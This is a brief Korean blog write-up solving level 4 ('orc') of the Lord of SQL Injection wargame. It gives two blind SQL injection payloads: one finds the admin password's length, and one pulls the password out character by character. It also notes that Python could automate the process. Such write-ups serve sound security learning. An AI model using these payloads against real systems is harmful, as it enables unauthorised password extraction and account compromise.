[Level 04]Lord of SQL injection – orc

Answer

pw=’||id=’admin’ && length(pw)=8%23로 pw가 8자리임을 파악한다.

pw=’||id=’admin’ && ascii(substr(pw,1,1))<50%23 으로 한글자씩 짚어 가며 찾는다.

또한 python을 사용해 찾을 수 도 있다.
하지만, python을 모른다면 직접 해보는것이 가장 빠르다.

카테고리LOS

글의 문제가 있다면 댓글을 달아 주세요.

이 사이트는 스팸을 줄이는 아키스밋을 사용합니다. 댓글이 어떻게 처리되는지 알아보십시오.